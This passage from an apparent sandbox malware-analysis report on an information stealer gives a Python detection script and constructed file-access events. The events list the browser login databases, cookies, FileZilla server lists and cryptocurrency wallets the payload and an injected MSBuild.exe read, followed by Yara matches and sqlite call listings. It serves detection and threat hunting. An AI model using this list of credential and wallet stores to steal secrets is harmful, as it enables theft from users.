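    'sweep' is set when the same process reaches into the stores of several different
    applications, the pattern a stealer shows and a single misbehaving tool rarely does.
    """
    hits: Dict[Tuple[int, str], List[Tuple[str, str]]] = defaultdict(list)
    for ev in events:
        found = classify(ev.path)
        if found is None:
            continue
        app, owners = found
        image = ntpath.basename(ev.image).lower()
        if image not in owners:
            hits[(ev.pid, image)].append((app, ev.path))
    alerts = []
    for (pid, image), items in hits.items():
        apps = sorted({app for app, _ in items})
        alerts.append({"pid": pid, "image": image, "apps": apps,
                       "paths": [p for _, p in items],
                       "sweep": len(apps) >= sweep_threshold})
    return alerts


# Constructed from the "File opened" lines in this section; PIDs are the ones in the
# Yara match lines. The chrome.exe event is a benign control and is not in the report.
_U = r"C:\Users\user\AppData"
_PAYLOAD = r"C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe"
_MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    FileEvent(6448, _PAYLOAD, _U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent(6448, _PAYLOAD, _U + r"\Local\Microsoft\Edge\User Data\Default\History"),
    FileEvent(6448, _PAYLOAD, _U + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileEvent(6448, _PAYLOAD, _U + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
    FileEvent(6448, _PAYLOAD, _U + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite"),
    FileEvent(6448, _PAYLOAD, _U + r"\Local\Google\Chrome\User Data\Default\Web Data"),
    FileEvent(6448, _PAYLOAD, _U + r"\Roaming\FileZilla\recentservers.xml"),
    FileEvent(6448, _PAYLOAD, _U + "\\Roaming\\Bitcoin\\wallets\\"),
    FileEvent(6448, _PAYLOAD, _U + "\\Roaming\\Exodus\\exodus.wallet\\"),
    FileEvent(1596, _MSBUILD, _U + r"\Local\Google\Chrome\User Data\Default\History"),
    FileEvent(1596, _MSBUILD, _U + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    FileEvent(4242, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              _U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["pid"], a["image"], "SWEEP" if a["sweep"] else "single", ", ".join(a["apps"]))
```

Run against the constructed events, the payload process is flagged as a sweep across six applications and MSBuild.exe as a foreign reader of Chrome data; the control chrome.exe event produces nothing. The MSBuild.exe hit is the more useful one for a hunt, since a build host has no reason to read browser databases, and the Sigma hit listed in the signature summary (MSBuild used as a stager) gives the same process a second, independent indicator.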

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C480C40 sqlite3_bind_zeroblob, 0_2_6C480C40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C480D60 sqlite3_bind_parameter_name, 0_2_6C480D60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3A8EA0 sqlite3_clear_bindings, 0_2_6C3A8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE91FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FE91FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE8DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset, 6_2_1FE8DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE25C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 6_2_1FE25C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE8DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 6_2_1FE8DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF3D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 6_2_1FF3D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEB5910 sqlite3_mprintf,sqlite3_bind_int64, 6_2_1FEB5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEED610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FEED610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEB55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FEB55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF3D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log, 6_2_1FF3D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF314D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 6_2_1FF314D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FECD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FECD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEB51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FEB51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEA9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf, 6_2_1FEA9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE40FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 6_2_1FE40FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEF4D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 6_2_1FEF4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE24820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize, 6_2_1FE24820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE606E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 6_2_1FE606E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE38680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64, 6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE68550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset, 6_2_1FE68550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE88200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 6_2_1FE88200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEF37E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FEF37E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FED3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FED3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE3B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64, 6_2_1FE3B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE6EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code, 6_2_1FE6EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE8A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value, 6_2_1FE8A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE266C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE7E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 6_2_1FE7E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE8E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 6_2_1FE8E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE7E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 6_2_1FE7E090